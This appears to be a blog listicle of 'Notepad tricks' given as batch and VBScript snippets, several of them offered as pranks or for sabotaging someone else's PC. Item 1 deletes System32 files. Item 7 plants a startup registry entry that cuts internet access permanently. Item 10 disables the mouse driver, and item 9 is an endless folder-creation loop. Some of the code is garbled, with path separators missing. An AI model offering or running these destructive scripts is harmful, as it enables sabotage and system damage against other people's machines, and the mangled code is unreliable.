10+ Interesting Notepad Tricks and Hacks To Do | You Cannot Miss!

Hello Guys, Hope you are doing well. I wish you will feel like your day has become much more special than other days after reading this post. This post is also going to make an interesting one as other posts. In this post, we will look at 10+ Interesting Notepad Tricks and Hacks To Do.


10+ Interesting Notepad Tricks and Hacks To Do  You Cannot Miss!



Notepad is one of the easiest tools Microsoft provides with every version of Windows. This is a common extended tool that can be used to create quick notes that can be mentioned anytime later. 

The file format that this tool saves is .txt, which means this text file can be read by every available text editor. Be it Quick Office, Microsoft Office, or any other office tool you can use easily.

The reason behind Notepad texts being so popular is that the files it creates can be opened, read, and edited from anywhere and are very easy. 

You have almost no formatting options. It was only used to quickly disassemble notes or by programmers who use them to store files with different extensions to finish their work.

Notepad is a very useful tool. The old version of notepad which is usually provided by the operating system doesn’t have all the features. 

The new version of notepad has numerous features, which will make your work super fast & easy and sometimes makes it funny. I personally use these tools and that’s why sharing awesome tricks and hacks with you.

READ MORE: 

10+ Interesting Notepad Tricks and Hacks To Do!

Here are some notepad tricks and hacks. you can use these tricks and do your work smartly. 

1. Delete System32 Files From Hard Drive : 

Although disclosing this type of information can cause more harm than good, it can be effective if you want to sabotage someone else’s computer or get rid of the infected system 32 files from your own PC.

These files are absolutely necessary to boot up and manage the computer, so don’t use them as a prank because your friend will probably never talk to you again.

You can, however, test it on your own computer as a test. This is a simple method of pasting the following code into your Notepad file and then saving it as a .bat file.

CODE 👇

DEL C:WINDOWSSYSTEM32*.*/Q

2. Click Enter Continuously :

Actually, This technique has no practical application. You can use it to annoy your friends because you have to press the enter button without even reaching their keyboard.
CODE 👇
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

 

3. Shut Down Computer :

Before you proceed with the instructions, we want to tell you that this is a rather risky strategy, and for everyone, it should probably not be taken in a sense. 
What it does is show a message to the user and shuts down the computer without the need for confirmation. While we believe this technique has no use, it can play as a prank.
CODE 👇
@echo off
msg *Bye, see you later
shutdown -c “Error! Bye, see you later” -s

 

4. Password Protect A Folder :

“pass.word” that has been written in bold and italics is the password that you need to change to one that you would like to be the password. Save the Notepad file as private.bat for creating a private folder.
You can move all your files, documents, and everything into that folder and lock it down. No one will be able to access this folder without knowing the exact password.
CODE 👇
@ECHO OFF
title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p “pass=>”
if NOT %pass%== pass.word goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

5. Make A Personal Diary :

The title itself is quite self-explanatory, follow the details to learn how to use Notepad as your personal diary without installing any additional tools. This strategy helps you get rid of the paid diary software.
CODE 👇
Type .LOG and press the Enter button
Save it with any name

6. Matrix Effect :

This is a really intresting trick because I use this trick. Use this code for matrix effect.
CODE 👇
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

7. Disable Internet Permanently :

This code will disable the internet connectivity permanently.
CODE 👇
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

8. Start Website :

Now you can open any website using notepad.

CODE 👇

start “www.examplewebsite.com” (without quotes and with a real domain name.) Save it as start.bat

9. Create Unlimited Folder :

This code will create an unlimited no. of folders.
CODE 👇
@echo off
😡
md %random%
/folder.
goto x

 10. Disable The Mouse :

This is another interesting notepad trick that disables your mouse after double-clicking the file that is created by using the code given below-
CODE 👇
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

11. Scroll Lock Hack :

This code will lock scrolling. Save Notepad file as Anything.vbs
CODE 👇
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{SCROLLLOCK}”
loop
Actually, Notepad is a general text editor offered by Microsoft’s Windows operating system. Typically, we use Notepad for typing and saving files to keep track of important things. Sometimes, Notepad can also be used by web designers and programmers for coding purposes. It supports a variety of extensions.
Generally, people consider Notepad to be just a text editor, but it’s more than that. In this article, you have found the simplest and most interesting tips, tricks, and features that are accessible through Notepad. We can even use Notepad as a powerful tool to control and manage computer programs and services.
LAST WORD: This is the end of the article. I hope, you have enjoyed this article. Ok, we will meet soon with a new interesting article post, and thank you so much for reading this full article post.

Leave a Comment

error: Content is protected !!